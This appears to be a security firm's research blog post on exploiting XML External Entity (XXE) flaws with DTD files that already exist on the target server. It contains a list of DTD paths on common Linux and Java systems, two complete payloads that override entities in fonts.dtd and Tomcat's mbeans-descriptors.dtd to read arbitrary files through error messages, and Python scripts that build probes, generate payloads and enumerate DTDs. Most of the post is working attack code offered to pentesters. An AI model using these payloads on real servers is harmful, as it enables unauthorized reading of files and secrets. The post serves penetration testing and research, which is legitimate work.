Last month, we presented an XML External Entities (XXE) exploitation workshop at Hack In Paris (France). It showcased methods to exploit XXE in the presence of numerous obstacles. Today, we present our method to exploit XXEs with a local Document Type Definition (DTD) file. More specifically, we explain how we built a large list of reusable DTD files.

XML External Entities (XXE) is a type of attack against an application that parses XML input. It occurs when XML input containing a reference to an external entity (SYSTEM entity) is processed by a weakly configured XML parser. Over the years, researchers have found multiple ways to exfiltrate content using various XML payloads.

A trend stands out: most of the techniques discovered require a secondary Document Type Definition (DTD) file. The DTD files used for these attacks have to be hosted on an HTTP server, and outgoing requests may not be possible in a strict network environment. However, Arseniy Sharoglazov’s technique circumvents this requirement by using DTD files that already exist on the attacked server.

  

Building a list of DTDs

The original research by Arseniy Sharoglazov already listed a few payload variations. It was more than enough to understand the patterns and build additional payloads. In our pentests, we have encountered at least two applications for which the known DTD files were not present on the vulnerable system.

We could not simply write a crawler to browse the remote filesystem: enumerating files by pointing a SYSTEM entity to a directory is possible only when the parsed XML is reflected in the response. However, we found a solution. We built a small list of DTD files present on common Linux distributions [Distro1] [Distro2] and tested by brute force whether those files were present. The initial DTD list was as follows:

./properties/schemas/j2ee/XMLSchema.dtd
./../properties/schemas/j2ee/XMLSchema.dtd
./../../properties/schemas/j2ee/XMLSchema.dtd
/usr/share/java/jsp-api-2.2.jar!/javax/servlet/jsp/resources/jspxml.dtd
/usr/share/java/jsp-api-2.3.jar!/javax/servlet/jsp/resources/jspxml.dtd
/root/usr/share/doc/rh-python34-python-docutils-0.12/docs/ref/docutils.dtd
/root/usr/share/doc/rh-python35-python-docutils-0.12/docs/ref/docutils.dtd
/usr/share/doc/python2-docutils/docs/ref/docutils.dtd
/usr/share/yelp/dtd/docbookx.dtd
/usr/share/xml/fontconfig/fonts.dtd
/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
/usr/lib64/erlang/lib/docbuilder-0.9.8.11/dtd/application.dtd
/usr/share/boostbook/dtd/1.1/boostbook.dtd
/usr/share/boostbook/dtd/boostbook.dtd
/usr/share/dblatex/schema/dblatex-config.dtd
/usr/share/struts/struts-config_1_0.dtd
/opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd

 
These DTDs were taken from searches of the Ubuntu and CentOS repositories and from Google searches. Once we confirmed the presence of a given file, we could download the DTD to build a valid payload.
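
The brute-force check lends itself to scripting. The following is a minimal sketch under stated assumptions, not the tooling used during our tests: it turns each candidate path into a probe document that does nothing but load the DTD. The helper names `to_system_uri` and `build_probe` are hypothetical, and the `jar:` prefix for paths containing `!/` assumes a Java-based parser. How presence is inferred from the response depends on the target and is not shown.

```python
# Candidate paths taken from the list above (shortened for the example).
CANDIDATES = [
    "/usr/share/xml/fontconfig/fonts.dtd",
    "/usr/share/yelp/dtd/docbookx.dtd",
    "/usr/share/java/jsp-api-2.3.jar!/javax/servlet/jsp/resources/jspxml.dtd",
]

# A probe only declares and includes the local DTD; it extracts nothing.
PROBE_TEMPLATE = """<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "{uri}">
    %local_dtd;
]>
<message></message>"""


def to_system_uri(path: str) -> str:
    """Map a candidate path to a SYSTEM identifier (assumed conventions)."""
    if "!/" in path:
        # Entry inside an archive: assumes Java's jar: URL syntax.
        return "jar:file://" + path
    if path.startswith("/"):
        return "file://" + path
    # Relative paths are left untouched and resolved by the parser.
    return path


def build_probe(path: str) -> str:
    """Return the XML document used to test for one candidate DTD."""
    return PROBE_TEMPLATE.format(uri=to_system_uri(path))


if __name__ == "__main__":
    for candidate in CANDIDATES:
        print(build_probe(candidate))
        print("-" * 40)
```

Each probe would then be sent to the vulnerable endpoint, and the responses compared to tell existing files from missing ones.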

Here is a demonstration of using a pre-built DTD list:

 

   

Automation

When trying to confirm a Web vulnerability, one wants to avoid manual work. For this reason, we wanted to grow the DTD list and avoid manually reviewing DTD files. To grow the list, we needed to sample various operating systems to obtain DTD files that are commonly installed on servers. To avoid inspecting DTD files, we had to generate XXE payloads automatically.
  

Obtaining as many DTDs as possible

First, we picked samples from a few Linux distributions to which we had access: Ubuntu, CentOS and Arch Linux. We realized that DTDs are found not only in the official distribution packages but also in packages from language ecosystems such as Ruby, Python and NPM.

Our second target was Docker containers used to host Java applications: Tomcat, WebLogic, JBoss, a JDK-only image and a few others. The container with only OpenJDK includes very few DTDs and none with a reusable entity. The files built into the Web containers, however, include a couple of DTDs.
  

Entity Injection patterns

Now that we have a list of DTDs, we enumerate the entities that can be overridden. For each of those, we look at how it is used and match it with the appropriate injection pattern. Here are two injection patterns:
  

ELEMENT injection

fonts.dtd:
<!ENTITY % expr 'int|double|string|matrix|bool|charset|langset
      |name|const
      |or|and|eq|not_eq|less|less_eq|more|more_eq|contains|not_contains
      |plus|minus|times|divide|not|if|floor|ceil|round|trunc'>
[...]
<!ELEMENT test (%expr;)*>
Associated XXE payload (The entity %expr is overridden):
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">

    <!ENTITY % expr 'aaa)>
        <!ENTITY &#x25; file SYSTEM "file:///FILE_TO_READ">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ELEMENT aa (bb'>

    %local_dtd;
]>
<message></message>
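
To see why this payload parses, it helps to reproduce the substitution by hand. The sketch below is a plain-text simulation, not a real XML parser: it decodes the character references in the overriding value, as a parser does when it reads the entity declaration, then pastes the result into the `<!ELEMENT test (%expr;)*>` line from fonts.dtd. The helper name `decode_char_refs` is ours, and the simulation ignores the padding spaces a real parser adds around the replacement text.

```python
import re

# Value assigned to %expr in the payload above (indentation shortened).
OVERRIDE_VALUE = """aaa)>
    <!ENTITY &#x25; file SYSTEM "file:///FILE_TO_READ">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
    <!ELEMENT aa (bb"""

# Line of fonts.dtd that references the overridden entity.
DTD_LINE = "<!ELEMENT test (%expr;)*>"


def decode_char_refs(value: str) -> str:
    """Decode hexadecimal character references in a single pass."""
    return re.sub(
        r"&#x([0-9A-Fa-f]+);",
        lambda match: chr(int(match.group(1), 16)),
        value,
    )


# Step 1: the declaration is read, character references become characters.
replacement_text = decode_char_refs(OVERRIDE_VALUE)

# Step 2: fonts.dtd references %expr; and receives our text instead.
expanded = DTD_LINE.replace("%expr;", replacement_text)
print(expanded)
```

The output starts with the complete declaration `<!ELEMENT test (aaa)>` and ends with `<!ELEMENT aa (bb)*>`, so the injected entity declarations sit between two valid ELEMENT declarations. Because they are now evaluated as part of the external DTD, the `%file;` reference inside the value of `eval` is allowed, which the internal subset alone would not permit.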

  

ATTLIST injection

mbeans-descriptors.dtd:
<!ENTITY % Boolean "(true|false|yes|no)">
[...]
<!ATTLIST attribute is %Boolean; #IMPLIED>
<!ATTLIST attribute readable %Boolean; #IMPLIED>
<!ATTLIST attribute writeable %Boolean; #IMPLIED>

  
Associated XXE payload (The entity %Boolean is overridden):

<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "jar:file:///usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd">

    <!ENTITY % Boolean '(aa) #IMPLIED>
        <!ENTITY &#x25; file SYSTEM "file:///FILE_TO_READ">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ATTLIST attxx aa "bb"'>

    %local_dtd;
]>

<message></message>

  
As can be seen, different contexts require different payloads. Looking at our sample DTDs, we identified 5 different contexts [C1] [C2] [C3] [C4] [C5]. Those 5 patterns are used to automate the construction of payloads for new DTD files. We test each pattern with an XML parser to validate that the entity is overridden successfully, which ensures that the payloads we generate actually work.
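
One way to think about a pattern is as a prefix and a suffix wrapped around a fixed exfiltration core. The sketch below encodes only the two patterns shown above; the other three are not reproduced here. `PATTERNS`, `build_payload` and the parameter names are hypothetical and are not meant to describe how our tool is implemented.

```python
# Fixed part of every payload: read a file, then leak it through a failing lookup.
CORE = """
        <!ENTITY &#x25; file SYSTEM "file:///FILE_TO_READ">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        """

# (prefix, suffix) pairs: the prefix closes the declaration that references
# the entity, the suffix opens a new one that the original DTD text completes.
PATTERNS = {
    "element": ("aaa)>", "<!ELEMENT aa (bb"),
    "attlist": ("(aa) #IMPLIED>", '<!ATTLIST attxx aa "bb"'),
}


def build_payload(dtd_uri: str, entity: str, pattern: str) -> str:
    """Assemble a payload overriding `entity` of the DTD found at `dtd_uri`."""
    prefix, suffix = PATTERNS[pattern]
    value = prefix + CORE + suffix
    return (
        "<!DOCTYPE message [\n"
        f'    <!ENTITY % local_dtd SYSTEM "{dtd_uri}">\n\n'
        f"    <!ENTITY % {entity} '{value}'>\n\n"
        "    %local_dtd;\n"
        "]>\n"
        "<message></message>"
    )


if __name__ == "__main__":
    print(build_payload("file:///usr/share/xml/fontconfig/fonts.dtd", "expr", "element"))
```

Keeping the core separate means that supporting a new context only requires a new prefix and suffix pair, which must then be validated against a real parser.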

   

Putting the pieces together

To summarize, here are the high-level steps taken by our tool, DTD Finder.

  1. Find DTD files, both directly on the filesystem and inside .jar or other zip files.
  2. Enumerate the entities declared.
  3. Test each of the entities with common injection patterns.
  4. Report the result summary to the console and the working payloads to a markdown file.
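
Steps 1 and 2 can be approximated in a few lines. This is a simplified sketch and not the code of our tool: the function names, the list of archive extensions and the regular expression are assumptions made for illustration. In particular, the regular expression does not skip declarations that appear inside DTD comments.

```python
import os
import re
import zipfile

# Matches parameter entity declarations such as: <!ENTITY % Boolean "...">
ENTITY_DECL = re.compile(r"<!ENTITY\s+%\s+([\w.:-]+)\s")
ARCHIVE_EXTENSIONS = (".jar", ".war", ".zip")


def parameter_entities(dtd_text: str) -> list:
    """Return declared parameter entity names, in order, without duplicates."""
    return list(dict.fromkeys(ENTITY_DECL.findall(dtd_text)))


def find_dtds(root: str):
    """Yield (location, text) for each .dtd under root, including archive entries."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if name.endswith(".dtd"):
                with open(path, encoding="utf-8", errors="replace") as handle:
                    yield path, handle.read()
            elif name.endswith(ARCHIVE_EXTENSIONS) and zipfile.is_zipfile(path):
                with zipfile.ZipFile(path) as archive:
                    for entry in archive.namelist():
                        if entry.endswith(".dtd"):
                            raw = archive.read(entry)
                            text = raw.decode("utf-8", errors="replace")
                            # Same "archive!/entry" notation as the list above.
                            yield f"{path}!/{entry}", text


def enumerate_entities(root: str) -> dict:
    """Map each DTD location to the parameter entities it declares."""
    return {location: parameter_entities(text) for location, text in find_dtds(root)}
```

Calling `enumerate_entities` on the root of an extracted filesystem returns the candidates that step 3 would then test against the injection patterns.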

Here is a demonstration of DTD enumeration on a Docker filesystem export.

   
   

Conclusion

The use of a local DTD file to exploit XXEs will become a common practice for Web pentesters. Being efficient at finding common DTD files should make the task easier. Having generated payloads will also make the attack accessible to testers with limited knowledge of XML.

In order to reproduce the demonstration above, you can pick up the DTD Finder tool on GoSecure’s GitHub. The tool can be used to generate a list for specific systems. You don’t need to run the tool to obtain XXE payloads. We have already generated a list of valid XXE payloads with over 50 DTDs.

   
